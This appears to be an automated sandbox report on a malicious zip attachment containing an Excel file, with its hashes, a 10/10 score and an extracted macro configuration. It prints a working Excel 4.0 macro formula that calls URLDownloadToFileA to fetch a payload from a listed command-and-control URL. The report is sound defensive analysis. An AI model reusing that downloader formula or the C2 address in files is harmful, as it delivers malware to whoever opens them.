General
-
Target
attached (63).zip
-
Size
11KB
-
MD5
3c7575af64aa28a479b84de660b0d7f1
-
SHA1
ba2d2425d42787d7f9cfda785b707a68ce1a5e9d
-
SHA256
ac8262129a41f40bc642673fb60c24dcad4da5af12f398cbb41b67ff337ed5e1
-
SHA512
e02c7c24b04a5a8121e53ecd68aa6d1875c72e3ab5fb7190bdd315501ff014a08f0a37828979db2d61c6aca705e755154ed74e277d603e1f4cf5db321d861433
Score
10/10
Malware Config
Extracted
Rule
Excel 4.0 XLM Macro
C2
http://ttj10qrrqx03kdts.com/inda.xls
Attributes
-
formulas
=CALL("URLMon","URLDownloadToFileA","JJCCBB",0,"http://ttj10qrrqx03kdts.com/inda.xls","..\fkruf.djr",0)
Signatures
-
Suspicious Office macro 1 IoCs
Office document equipped with 4.0 macros.
Files
-
attached (63).zip
-
document-1557878943.xls